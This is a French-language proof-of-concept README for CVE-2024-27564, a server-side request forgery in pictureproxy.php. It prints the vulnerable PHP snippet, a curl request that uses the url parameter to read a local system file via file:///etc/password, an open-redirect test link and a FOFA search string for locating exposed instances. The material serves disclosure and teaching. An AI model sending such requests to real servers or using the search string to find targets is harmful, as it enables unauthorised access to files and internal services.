
Preuve de concept d'exploit pour CVE-2024-27564, démontrant une SSRF via un paramètre URL non validé dans pictureproxy.php. Inclut des tests basés sur curl et une recherche FOFA pour les instances vulnérables.
Ce projet démontre une vulnérabilité de type Server-Side Request Forgery (SSRF) dans le fichier pictureproxy.php.
Une vulnérabilité dans pictureproxy.php permet à des attaquants distants d'effectuer des requêtes arbitraires en injectant des URLs dans le paramètre url. Cette vulnérabilité SSRF peut être exploitée sans authentification, ce qui la rend particulièrement dangereuse.
Le code vulnérable se trouve dans le fichier pictureproxy.php. Le problème survient car la fonction ne valide pas correctement le paramètre url. La variable $_GET['url'] est transmise à la fonction file_get_contents(), qui récupère le contenu de l'URL spécifiée. Cela peut conduire à une SSRF.
Voici une preuve de concept simple qui montre comment la vulnérabilité peut être exploitée :
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Pour tester la vulnérabilité, vous pouvez utiliser la commande curl suivante :
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
Un test utilisant une vulnérabilité de redirection ouverte :
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
Bannière
"title="ChatGPT个人专用版""
Ce projet souligne l'importance de valider correctement les entrées utilisateur pour éviter les vulnérabilités SSRF. Assurez-vous toujours que les paramètres comme les URLs sont soigneusement vérifiés avant d'être traités.